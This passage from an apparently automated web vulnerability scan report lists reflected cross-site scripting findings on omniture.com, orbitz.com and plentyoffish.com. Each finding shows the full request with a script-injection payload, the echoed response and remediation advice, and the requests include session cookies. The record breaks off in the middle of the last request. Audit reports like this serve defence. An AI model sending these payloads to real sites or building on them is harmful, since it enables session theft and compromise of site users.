Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en/services/esba886--><script>alert(1)</script>0a2fdf8ad23 HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/3; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=natural_bookmark; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092330|check#true#1296673197|session#1296673129491-732177#1296674990; s_cc=true; use207=7; s_sv_s1=1@28@a//1296661247027/13731382181; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=c4b47f0affb47cea2cd263f6285f016c;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:07:43 GMT
Cache-Control: public, max-age=14400
Last-Modified: Wed, 02 Feb 2011 19:07:43 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:07:43 GMT
Content-Length: 24392
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:07:43 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Online Business Optimization Pl
...[SNIP]...
<script>alert(1)</script>0a2fdf8ad23 cached on 2 February 2011 at 11:07:43 PST (bcf2ffd0e21aac4344dbdc9ba9119bf3) -->
...[SNIP]...

4.517. http://www.omniture.com/en/survey/5084 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.omniture.com
Path:	/en/survey/5084

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload a1e55(a)b395539b8e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /en/survey/5084a1e55(a)b395539b8e HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/5; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=seo_other_referer; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_cc=true; use207=7; s_sv_s1=1@29@a//1296661247027/594025749283; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Fri, 04 Feb 2011 05:58:36 GMT
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Thu, 03 Feb 2011 05:58:36 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Thu, 03 Feb 2011 05:58:36 GMT
Content-Length: 4161
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 05:58:36 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
   <title>Omniture | Survey</title>

   <m
...[SNIP]...
<script language='javascript'>
var surveyPrefix = ": SID: ";
var surveyID=5084a1e55(a)b395539b8e;
</script>
...[SNIP]...

4.518. http://www.omniture.com/press/867 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/press/867

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload cb5f4--><script>alert(1)</script>23422c10eea was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /press/867cb5f4--><script>alert(1)</script>23422c10eea HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/5; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=seo_other_referer; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_cc=true; use207=7; s_sv_s1=1@29@a//1296661247027/594025749283; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Fri, 04 Feb 2011 06:08:03 GMT
Cache-Control: public, max-age=14400
Last-Modified: Thu, 03 Feb 2011 06:08:03 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Thu, 03 Feb 2011 06:08:03 GMT
Content-Length: 32342
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 06:08:03 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Omniture Press Detail: New Adob
...[SNIP]...
<script>alert(1)</script>23422c10eea cached on 2 February 2011 at 22:08:03 PST (4d763a1de0558dab40ab3a5ed162b060) -->
...[SNIP]...

4.519. http://www.omniture.com/press/867 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.omniture.com
Path:	/press/867

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9099e"><a>8d715d94b6c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /press/8679099e"><a>8d715d94b6c HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/5; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=seo_other_referer; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_cc=true; use207=7; s_sv_s1=1@29@a//1296661247027/594025749283; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Fri, 04 Feb 2011 06:06:09 GMT
Cache-Control: public, max-age=14400
Last-Modified: Thu, 03 Feb 2011 06:06:09 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Thu, 03 Feb 2011 06:06:09 GMT
Content-Length: 22979
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 06:06:09 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Omniture Press Detail: Old Rele
...[SNIP]...
<link rel="stylesheet" type="text/css" media="screen" href="http://style.omniture.com/stylesheet.css?lang=en&section=8679099e"><a>8d715d94b6c&ignore_skin=0" />
...[SNIP]...

4.520. http://www.omniture.com/press/868 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/press/868

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload dcde3--><script>alert(1)</script>75d5b2290fe was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /press/868dcde3--><script>alert(1)</script>75d5b2290fe HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/5; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=seo_other_referer; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_cc=true; use207=7; s_sv_s1=1@29@a//1296661247027/594025749283; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Fri, 04 Feb 2011 06:08:51 GMT
Cache-Control: public, max-age=14400
Last-Modified: Thu, 03 Feb 2011 06:08:51 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Thu, 03 Feb 2011 06:08:51 GMT
Content-Length: 32252
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 06:08:51 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Omniture Press Detail: Adobe Ac
...[SNIP]...
<script>alert(1)</script>75d5b2290fe cached on 2 February 2011 at 22:08:51 PST (0413084e7c46999031afb0b8836712d0) -->
...[SNIP]...

4.521. http://www.omniture.com/press/868 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.omniture.com
Path:	/press/868

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 505df"><a>a4a1b0dff6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /press/868505df"><a>a4a1b0dff6 HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/5; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=seo_other_referer; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_cc=true; use207=7; s_sv_s1=1@29@a//1296661247027/594025749283; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Fri, 04 Feb 2011 06:07:07 GMT
Cache-Control: public, max-age=14400
Last-Modified: Thu, 03 Feb 2011 06:07:07 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Thu, 03 Feb 2011 06:07:07 GMT
Content-Length: 22975
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 06:07:07 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Omniture Press Detail: Old Rele
...[SNIP]...
<link rel="stylesheet" type="text/css" media="screen" href="http://style.omniture.com/stylesheet.css?lang=en&section=868505df"><a>a4a1b0dff6&ignore_skin=0" />
...[SNIP]...

4.522. http://www.orbitz.com/App/GDDC [deal_id parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/App/GDDC

Issue detail

The value of the deal_id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 954c0"style%3d"x%3aexpression(alert(1))"4d82bd8d62a was submitted in the deal_id parameter. This input was echoed as 954c0"style="x:expression(alert(1))"4d82bd8d62a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /App/GDDC?deal_id=aeromexico-winter-fares\954c0"style%3d"x%3aexpression(alert(1))"4d82bd8d62a HTTP/1.1
Host: www.orbitz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DataPersistence="||||||Same as pick-up||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|New+York%2C+NY|Orlando%2C+FL|02/11/11|||||||||mm/dd/yy|02/17/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|"; JSESSIONID=D1DA21DD44B66783CD13169E22B74D3D; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e3d5ba45525d5f4f58455e445a4a4217b9; BetaGroup="01/27/2011 19:45:19|A|A|N|C|N|H|B|P|N"; OSC=265DA875C314B0C54855FC80AB1B1D8C; myFavoriteHotels=favoriteHotels%3A%7CpastSearches%3A%7BHOTEL_Boston%2C+MA%2C+United+States_1_2011-02-01T00%3A00%3A00.000-06%3A00_2011-02-02T00%3A00%3A00.000-06%3A00____35371_2_1_1_1%7D; logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; myTests=UBP323_SinglePage%3A%7C%3A%7C%3A%7CMERCH500_hotelResultCards%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7Cv1; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72d45525d5f4f58455e445a4a4217b9; mbox=check#true#1296573951|session#1296573790873-999455#1296575751; dpc=HOTEL%7C1.6%7C%7CBoston%2C+MA%2C+United+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-02-01%7C2011-02-02%7C1%7C2%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C+%7C%26%26HE; OrbitzRegistration="N,0,0,0"; NSC_JOu2s3r4deikrvveb50lfpcjwwizbbq=ffffffff09e3b63045525d5f4f58455e445a4a4217b9; anon=8916556551294354144817; PackagingContext=APH; WT_FPC=id=173.193.214.243-3953790720.30125555:lv=1296573936983:ss=1296573790782; adRotator=true; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660; intentmedia_user_id=e6908583-79a9-4ea3-a0a2-86edabb110c5;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: OSC=E35A05AFA43F7428074770D0017AA45F; Path=/
Cache-Control: private
Pragma: no-cache
Set-Cookie: logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; Domain=.orbitz.com; Path=/
P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR DELi SAMi OTRi BUS PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE GOV"
Content-Type: text/html
Date: Wed, 02 Feb 2011 16:11:58 GMT
Content-Length: 184528

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-t
...[SNIP]...
<Meta Name="DCSext.ndid" CONTENT="aeromexico-winter-fares\954c0"style="x:expression(alert(1))"4d82bd8d62a,NC"/>
...[SNIP]...

4.523. http://www.orbitz.com/App/PerformMDLPDealsContent [cnt parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/App/PerformMDLPDealsContent

Issue detail

The value of the cnt request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 505c6"style%3d"x%3aexpression(alert(1))"6c0248732b6 was submitted in the cnt parameter. This input was echoed as 505c6"style="x:expression(alert(1))"6c0248732b6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /App/PerformMDLPDealsContent?deal_id=promotions&cnt=PRO505c6"style%3d"x%3aexpression(alert(1))"6c0248732b6&type=oa_qs HTTP/1.1
Host: www.orbitz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DataPersistence="||||||Same as pick-up||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|New+York%2C+NY|Orlando%2C+FL|02/11/11|||||||||mm/dd/yy|02/17/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|"; JSESSIONID=D1DA21DD44B66783CD13169E22B74D3D; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e3d5ba45525d5f4f58455e445a4a4217b9; BetaGroup="01/27/2011 19:45:19|A|A|N|C|N|H|B|P|N"; OSC=265DA875C314B0C54855FC80AB1B1D8C; myFavoriteHotels=favoriteHotels%3A%7CpastSearches%3A%7BHOTEL_Boston%2C+MA%2C+United+States_1_2011-02-01T00%3A00%3A00.000-06%3A00_2011-02-02T00%3A00%3A00.000-06%3A00____35371_2_1_1_1%7D; logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; myTests=UBP323_SinglePage%3A%7C%3A%7C%3A%7CMERCH500_hotelResultCards%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7Cv1; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72d45525d5f4f58455e445a4a4217b9; mbox=check#true#1296573951|session#1296573790873-999455#1296575751; dpc=HOTEL%7C1.6%7C%7CBoston%2C+MA%2C+United+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-02-01%7C2011-02-02%7C1%7C2%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C+%7C%26%26HE; OrbitzRegistration="N,0,0,0"; NSC_JOu2s3r4deikrvveb50lfpcjwwizbbq=ffffffff09e3b63045525d5f4f58455e445a4a4217b9; anon=8916556551294354144817; PackagingContext=APH; WT_FPC=id=173.193.214.243-3953790720.30125555:lv=1296573936983:ss=1296573790782; adRotator=true; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660; intentmedia_user_id=e6908583-79a9-4ea3-a0a2-86edabb110c5;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: OSC=D880EA6E561408E7CB3D9A862553C227; Path=/
Cache-Control: private
Pragma: no-cache
Set-Cookie: logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; Domain=.orbitz.com; Path=/
P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR DELi SAMi OTRi BUS PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE GOV"
Content-Type: text/html
Date: Wed, 02 Feb 2011 16:10:26 GMT
Content-Length: 186935

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w
...[SNIP]...
<Meta Name="DCSext.ndtab" CONTENT="PRO505c6"style="x:expression(alert(1))"6c0248732b6"/>
...[SNIP]...

4.524. http://www.orbitz.com/App/PerformMDLPDealsContent [type parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/App/PerformMDLPDealsContent

Issue detail

The value of the type request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 929f5"style%3d"x%3aexpression(alert(1))"10bcaca89b2 was submitted in the type parameter. This input was echoed as 929f5"style="x:expression(alert(1))"10bcaca89b2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /App/PerformMDLPDealsContent?deal_id=promotions&cnt=PRO&type=oa_qs929f5"style%3d"x%3aexpression(alert(1))"10bcaca89b2 HTTP/1.1
Host: www.orbitz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DataPersistence="||||||Same as pick-up||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|New+York%2C+NY|Orlando%2C+FL|02/11/11|||||||||mm/dd/yy|02/17/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|"; JSESSIONID=D1DA21DD44B66783CD13169E22B74D3D; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e3d5ba45525d5f4f58455e445a4a4217b9; BetaGroup="01/27/2011 19:45:19|A|A|N|C|N|H|B|P|N"; OSC=265DA875C314B0C54855FC80AB1B1D8C; myFavoriteHotels=favoriteHotels%3A%7CpastSearches%3A%7BHOTEL_Boston%2C+MA%2C+United+States_1_2011-02-01T00%3A00%3A00.000-06%3A00_2011-02-02T00%3A00%3A00.000-06%3A00____35371_2_1_1_1%7D; logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; myTests=UBP323_SinglePage%3A%7C%3A%7C%3A%7CMERCH500_hotelResultCards%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7Cv1; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72d45525d5f4f58455e445a4a4217b9; mbox=check#true#1296573951|session#1296573790873-999455#1296575751; dpc=HOTEL%7C1.6%7C%7CBoston%2C+MA%2C+United+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-02-01%7C2011-02-02%7C1%7C2%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C+%7C%26%26HE; OrbitzRegistration="N,0,0,0"; NSC_JOu2s3r4deikrvveb50lfpcjwwizbbq=ffffffff09e3b63045525d5f4f58455e445a4a4217b9; anon=8916556551294354144817; PackagingContext=APH; WT_FPC=id=173.193.214.243-3953790720.30125555:lv=1296573936983:ss=1296573790782; adRotator=true; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660; intentmedia_user_id=e6908583-79a9-4ea3-a0a2-86edabb110c5;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: OSC=84F195AE3CDB76F652543ADC1AC7645F; Path=/
Cache-Control: private
Pragma: no-cache
Set-Cookie: logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; Domain=.orbitz.com; Path=/
P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR DELi SAMi OTRi BUS PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE GOV"
Content-Type: text/html
Date: Wed, 02 Feb 2011 16:11:33 GMT
Content-Length: 186870

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w
...[SNIP]...
<Meta Name="DCSext.ndid" CONTENT="promotions,oa_qs929f5"style="x:expression(alert(1))"10bcaca89b2"/>
...[SNIP]...

4.525. http://www.plentyoffish.com/meetme.aspx [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.plentyoffish.com
Path:	/meetme.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b41c1"><script>alert(1)</script>b9320b26f68 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /meetme.aspx?b41c1"><script>alert(1)</script>b9320b26f68=1 HTTP/1.1
Host: www.plentyoffish.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmx=9489908.00012890560422417014:1:0-1-1-0; my_ipcountry=1; __utmxx=9489908.00012890560422417014:3738630:2592000; __utmz=9489908.1296523584.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmx_k_210735692=1; __utma=9489908.1831818404.1296523584.1296523584.1296523584.1; ft=Monday, January 31, 2011 5:25:37 PM; __utmc=9489908; __utmb=9489908.5.10.1296523584; ASP.NET_SessionId=enhftrh2rwh40ylxbcdqkhlw;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 01 Feb 2011 01:30:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 4357

<html><head><title>Find Singles with Plentyoffish FREE Online Dating Personals Service</title>

<META HTTP-EQUIV="CACHE-CONTROL" CONTENT="NO-CACHE">
<META HTTP-EQUIV="PRAGMA" CONTENT="N
...[SNIP]...
<form action="?SID=enhftrh2rwh40ylxbcdqkhlw&b41c1"><script>alert(1)</script>b9320b26f68=1" method="post" name="frmLogin" >
...[SNIP]...

4.526. http://www.plentyoffish.com/needs_test.aspx [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.plentyoffish.com
Path:	/needs_test.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71843"><script>alert(1)</script>d3bff3c6b0f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /needs_test.aspx?71843"><script>alert(1)</script>d3bff3c6b0f=1 HTTP/1.1
Host: www.plentyoffish.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
